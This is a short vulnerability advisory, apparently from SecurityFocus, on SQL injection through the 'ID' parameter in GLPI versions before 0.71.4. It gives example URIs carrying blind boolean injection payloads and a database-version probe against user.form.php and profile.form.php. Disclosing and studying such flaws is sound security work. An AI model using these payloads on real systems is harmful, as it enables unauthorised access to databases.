GLPI Prior to 0.71.4 'ID' Parameter Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/glpi/front/user.form.php?ID=2+and+1=1 True
http://www.example.com/glpi/front/user.form.php?ID=2+and+1=1337 False
http://www.example.com/glpi/front/user.form.php?ID=2+and+substring(version(),1,1)=5
http://www.example.com/glpi/front/profile.form.php?ID=2+and+1=1337


 

Privacy Statement
Copyright 2010, SecurityFocus